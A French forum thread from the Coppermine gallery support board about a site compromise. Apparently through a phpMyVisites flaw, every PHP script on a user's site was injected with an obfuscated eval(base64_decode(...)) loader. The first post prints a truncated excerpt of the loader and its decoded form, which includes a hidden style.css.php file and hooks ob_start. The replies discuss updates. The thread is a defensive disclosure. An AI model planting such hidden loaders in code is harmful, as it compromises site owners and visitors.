Advanced search  

News:

cpg1.5.46 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter recently discovered vulnerabilities. It is important that all users who run version cpg1.5.44 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: Alerte Sécurité de PHPMYVISITS via fckeditor de minicms  (Read 3007 times)

0 Members and 1 Guest are viewing this topic.

pbasmo

  • Contributor
  • Coppermine frequent poster
  • ***
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 133
    • Galerie de photos
Alerte Sécurité de PHPMYVISITS via fckeditor de minicms
« on: January 18, 2010, 11:48:02 pm »

Bonjour à tous

Tout d'abord excellente année à toute l'équipe ! Je sais qu'une nouvelle version de Coppermine est en route et on ne peut que lui souhaiter une longue vie !
Mais désolé d'être aussi alarmiste dans le titre de mon topic mais je pense qu'il y a matière à l'être !

J'explique :

Après avoir consulté mon site via FileZilla pour mettre en sécurité l'utilitaire phpmyvisits à cause d'une alerte de sécurité (voir http://www.phpmyvisites.us/#infohack) je me suis aperçu que TOUS les scripts du site ont été modifiés le même jour à la même heure (15/12/2009 à 00:05 environ).

J'ai donc téléchargé quelques scripts pris au hasard et j'ai constaté l'insertion d'un code malveillant en début de script.
En voici un extrait (avec des balises d'ouverture et fermeture php que j'ai omises ici) :

/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3..(suit une longue chaine en héxadécimal)....'));

Après l'avoir isolé et afficher le code en clair, voici ce qu'il raconte :

Code: [Select]
//*************************** Script parasite
/*
Après décodage, le script se base sur une fonction du plugins 'micicms'
et particulièrement du module fckeditor

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn']))
{
$GLOBALS['mfsn']='(emplacement en clair de mon site sur le serveur free)/pierre.basmoreau/album/plugins/minicms/fckeditor/editor/filemanager/browser/mcpuk/connectors/php/Commands/helpers/style.css.php';
if(file_exists($GLOBALS['mfsn']))
{
include_once($GLOBALS['mfsn']);

if(function_exists('gml')&&function_exists('dgobh'))
{
ob_start('dgobh');
}
}
}
*/
//********************************


Autant dire que j'ai fermé rapidement le site, détruit tous les scripts sans distinction et reuploadé les versions originales de coppermine et autres utilitaires !

N'étant pas spécialiste de hacking, je ne sais pas trop le but de ce script. Il semble que la faille détectée dans phpmyvisits a contribué à insérer ce code malveillant et qu'il utilise une fonctionnalité de fckeditor présent dans le plugin 'minicms'.

AVIS A TOUS CEUX QUI UTILISENT PHPMYVISITS DANS LEUR SITE.

Je voulais vous mettre au courant rapidement.

Bonne continuation a tous.

(j'ai changé le sujet pour indiquer que c'est bien PhpMyVisits qui pose problème et non le plusgin minicms)
« Last Edit: January 19, 2010, 05:20:54 pm by pbasmo »
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9097
  • aka Frantz
    • Ma galerie
Re: Alerte Sécurité via fckeditor de minicms et phpmyvisits
« Reply #1 on: January 19, 2010, 07:24:03 am »

Bonjour Pierre,
merci pour cette info. Malheureusement, minicms est pour le moment abandonné par son auteur, il n'y a donc pas eu de mises à jour depuis un moment, même si apparemment certains vont le rendre compatible avec cpg1.5.x.
Tout le problème est maintenant de savoir quelle était la version de coppermine (il y a eu des attaques du même genre il y a un certain temps (cpg1.4.18 si je me souviens bien) et la faille utilisée a été corrigée.
Concernant phpmyvisite, il semble bien que ce soit la faille trouvée qui a été utilisée... Je ne suis pas sur que ce soit minicms qui soit en cause, mais moi non plus je ne suis pas spécialiste.
EN tout état de cause, il est impératif lorsque l'on utilise des scripts de les mettre à jour très régulièrement dès l'apparition d'une nouvelle version pour limiter autant que possible ce genre de désagrément
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

pbasmo

  • Contributor
  • Coppermine frequent poster
  • ***
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 133
    • Galerie de photos
Re: Alerte Sécurité via fckeditor de minicms et phpmyvisits
« Reply #2 on: January 19, 2010, 04:54:12 pm »

Bonsoir François,

La version de coppermine était la dernière, 1.4.25 mais la version du plugin 'minicms' était la 1.7.
J'ai récupéré la version 2 de minicms et j'ai comparé le contenu de ces 2 versions. Il y a de grandes différences au niveau du module fckeditor :

-minicms version 1.7 avec fckeditor de 2006
-minicms version 2 avec fckeditor 2.6.5

Mais le plugin en lui-même n'est pas en cause.

Ce que je regrette de ne pas avoir fait dans ma précipitation est de récupérer le script php utilisé dans le code malveillant (style.css.php) car ce fichier n'existe pas dans fckeditor de la version 1.7 de minicms.
Il aurait été intéressant de connaître le code pour s'en protéger ultérieurement.

Mais de toute évidence il faut passer au successeur de phpmyvisit qui est Piwik.

Bonne continuation
« Last Edit: January 19, 2010, 05:05:23 pm by pbasmo »
Logged
Pages: [1]   Go Up
 

Page created in 0.016 seconds with 21 queries.